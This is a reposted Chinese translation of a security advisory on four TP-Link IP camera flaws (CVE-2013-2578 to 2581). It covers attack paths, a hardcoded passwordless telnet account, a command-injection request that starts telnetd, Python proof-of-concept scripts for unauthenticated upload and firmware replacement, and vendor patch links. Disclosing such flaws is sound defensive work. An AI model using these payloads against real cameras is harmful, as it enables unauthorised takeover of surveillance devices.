TP-Link网络摄像机的多个漏洞详细分析

漏洞描述:

TP-LinkTL-SC3171 IP Cameras网络摄像机的版本为LM.1.6.18P12_sign5的固件上存在多个漏洞,这些漏洞允许攻击者做如下的事情:

1:[CVE-2013-2578]通过文件 /cgi-bin/admin/servetest执行任意命令。

2:[CVE-2013-2579]用硬编码身份凭证的shell执行任意命令。

3:[CVE-2013-2580]执行未经身份认证的远程文件上传。

4:[CVE-2013-2581]执行未经身份认证的固件升级。

攻击路径:

通过结合这些漏洞,多个攻击路径可被利用。额外的攻击路径也是可用的,但这里的攻击路径可以让你了解攻击者如何危及受影响的的设备。

攻击路径1:

(验证:无)

1:通过[CVE-2013-2581]漏洞上传一个已经root的固件。

2:通过http:///cgi-bin/reboot 重启设备。

攻击路径2:

(验证:绕过)

1:通过http:///cgi-bin/hardfactorydefault将设备重置为出厂默认设置。之后,通过使用admin:admin作为有效的用户和密码绕过验证。

2:通过http:///cgi-bin/reboot重启设备。

3:通过[CVE-2013-2578]漏洞开启Telnet服务。

4:使用用户qmik(没有密码)登陆Telnet服务,并使该设备作为枢轴点。

受影响的设备和固件:

TP-Link TL-SC3130 (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3130G (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3171 (固件版本M.1.6.18P12_sign5及以下)
TP-Link TL-SC3171G (固件版本LM.1.6.18P12_sign5及以下)

其他的TP-Link网络摄像机和固件版本可能也受影响。

供应商信息,解决方案和解决方法:

厂商提供的测试版修补固件版本链接如下:

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip

[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip

[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip

[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip

最终的正式版本将公布在未来数天,请联系TP-LINK了解更多信息。

技术细节说明和PoC:

1:servetest中的操作系统命令注入

[CVE-2013-2578]文件/cgi-bin/admin/servetest有几个参数可以被用于操作系统命令注入,这会导致通过身份验证的用户可以执行任意命令。下面的PoC启动telnet服务:

GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: <a href="http://192.168.1.100/progress.htm">http://192.168.1.100/progress.htm</a>
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2

2:telnet服务中的硬编码身份认证

[CVE-2013-2579]受影响的系统包含一个不需要密码的硬编码登录,这会导致远程攻击者使用这个内置的telnet服务来登录受影响设备的操作系统,用户和密码:

username: qmik
password: (none)

qmik用户被允许执行命令su,这会导致以root权限执行任意命令。telnet服务可以用通过[CVE-2013-2578]漏洞开启。

3:未经身份验证的远程文件上传

[CVE-2013-2580]文件/cgi-bin/uploadfile允许未经身份验证的用户进行远程文件上传,下面是Python PoC:

import requests
 
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("<a href="http://192.168.1.100/cgi-bin/uploadfile">http://192.168.1.100/cgi-bin/uploadfile</a>", files={fileName: open(fileName, "rb")})

上传文件(在本例中lala.tmp)将会被放置在/mnt/mtd目录中。

4:未经身份验证的远程固件升级

[CVE-2013-2581]文件/cgi-bin/firmwareupgrade允许未经身份验证的用户执行远程固件升级,PythonPoC如下:

import requests
 
requests.get("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)

引用:

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.

[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip.

[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip.

[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip.

[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip.

原文来自:http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/146951.html<

(0)
管理的头像管理
上一篇2025-03-11 08:07
下一篇 2025-03-11 08:09

相关推荐

  • 云服务器和云虚拟主机怎么选?云服务器和虚拟主机区别

    云服务器适合业务增长快、需弹性扩展的场景,而云虚拟主机适合预算有限、技术门槛低的小型静态网站或测试环境,二者核心区别在于资源独享性与运维复杂度,核心差异解析:从底层架构到使用体验很多人容易混淆这两者,觉得它们都是“买空间建站”,它们的底层逻辑完全不同,云服务器(ECS)就像是你租了一整栋别墅,水电网络独立,你想……

    2026-06-29
    0
  • 赣州智慧旅游招聘是真的吗?赣州旅游人才招聘信息

    中级岗位(3-5年经验)月薪范围通常在6000-10000元,这类岗位需要独立负责项目模块,如独立运营一个抖音账号,或维护一个景区小程序的功能迭代,具备成功案例的候选人议价能力较强,高级岗位(5年以上经验)月薪范围通常在10000-20000元,部分核心管理岗可达更高,这类人才需要具备战略规划能力,如制定整个景……

    2026-06-29
    0
  • 赣州智能物联网车位锁如何管理?智能车位锁管理系统多少钱

    赣州智能物联网车位锁管理的核心在于通过云端平台实现远程控锁、状态实时监控及自动计费,彻底解决传统车位“被占难管”与“找位难”的痛点,在赣州这样的城市,随着机动车保有量的持续增长,老旧小区、商业综合体以及私人固定车位的资源矛盾日益凸显,传统的机械地锁或简易遥控锁,不仅操作繁琐,更无法实现数据化管理,引入智能物联网……

    2026-06-29
    0
  • 赣州智能消防栓好用吗,智能消防栓多少钱一个

    赣州智能消防栓通过物联网技术实现实时监测与远程报警,能显著降低火灾响应时间并提升城市消防安全管理水平,是目前智慧城市建设中不可或缺的基础设施,赣州智能消防栓的核心价值与应用场景传统消防栓往往存在“看不见、摸不着、用不了”的痛点,在赣州这样地形复杂、老城区与新城区并存的区域,传统设施的管理难度极大,智能消防栓的出……

    2026-06-29
    0
  • 云服务器和物理机到底有啥区别?

    云服务器本质上是虚拟化资源池中的弹性实例,而传统物理服务器是独占的硬件实体,前者胜在弹性与运维便捷,后者强在物理隔离与性能稳定,具体选择取决于业务对成本、扩展性及安全合规的权衡,很多人初次接触服务器时,容易把“云服务器”和“传统物理服务器”混为一谈,觉得它们都是用来跑网站或存数据的盒子,这两者的底层逻辑完全不同……

    2026-06-29
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注